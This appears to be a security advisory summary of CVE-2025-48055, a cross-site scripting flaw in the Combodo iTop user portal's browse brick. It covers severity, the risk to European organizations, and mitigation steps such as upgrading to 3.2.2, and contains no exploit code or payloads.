CVE-2025-48055 is a cross-site scripting (XSS) vulnerability classified under CWE-79 affecting Combodo iTop, a web-based IT service management platform. The vulnerability exists in versions prior to 3.2.2 and occurs when the application improperly neutralizes user-supplied input during web page generation, specifically within a browse brick component on the user portal. This improper input sanitization allows an attacker with low privileges to inject malicious JavaScript code that executes in the context of other users viewing the affected page. The vulnerability does not require user interaction (UI:N) and can be exploited remotely over the network (AV:N) with low attack complexity (AC:L). The attacker must have some privileges (PR:L), but no elevated rights are necessary. Exploitation can lead to a complete compromise of confidentiality (C:H) by stealing session tokens, credentials, or other sensitive data accessible via the portal. Integrity impact is limited (I:L), and availability is not affected (A:N). The vulnerability affects the scope of the system (S:C), meaning the impact extends beyond the vulnerable component. The issue was publicly disclosed on November 10, 2025, and fixed in versions 3.2.2 and 3.3.0 of iTop. No known exploits have been reported in the wild yet. The CVSS v3.1 base score is 8.5, indicating a high-severity threat. Given the nature of ITSM tools, which often contain sensitive organizational data and are used for managing IT assets and incidents, exploitation could facilitate further attacks or data breaches.

For European organizations, this vulnerability poses a significant risk to the confidentiality of sensitive IT service management data, including user credentials, configuration details, and incident records. Since iTop is used to manage IT assets and services, successful exploitation could enable attackers to gather intelligence for lateral movement or escalate privileges within the network. The lack of required user interaction and the ability to exploit remotely increase the attack surface, especially for organizations exposing the user portal to the internet. Confidentiality breaches could lead to regulatory non-compliance under GDPR, resulting in legal and financial repercussions. Additionally, compromised ITSM platforms may disrupt incident response and service management processes, indirectly affecting operational integrity. Organizations in sectors with critical infrastructure or high-value targets, such as finance, healthcare, and government, are particularly vulnerable. The absence of known exploits in the wild currently reduces immediate risk but does not eliminate the threat, making timely patching essential.

1. Upgrade all Combodo iTop instances to version 3.2.2 or later immediately to apply the official fix. 2. Implement strict input validation and output encoding on all user-supplied data displayed in the user portal, especially within browse bricks, to prevent injection of malicious scripts. 3. Restrict access to the user portal to trusted networks or via VPN to reduce exposure to external attackers. 4. Employ web application firewalls (WAFs) with rules designed to detect and block XSS payloads targeting iTop. 5. Conduct regular security audits and penetration testing focusing on web application vulnerabilities in ITSM tools. 6. Educate users and administrators about the risks of XSS and encourage prompt reporting of suspicious portal behavior. 7. Monitor logs for unusual activity indicative of attempted exploitation, such as suspicious query parameters or script injections. 8. Consider implementing Content Security Policy (CSP) headers to limit the execution of unauthorized scripts in the portal environment.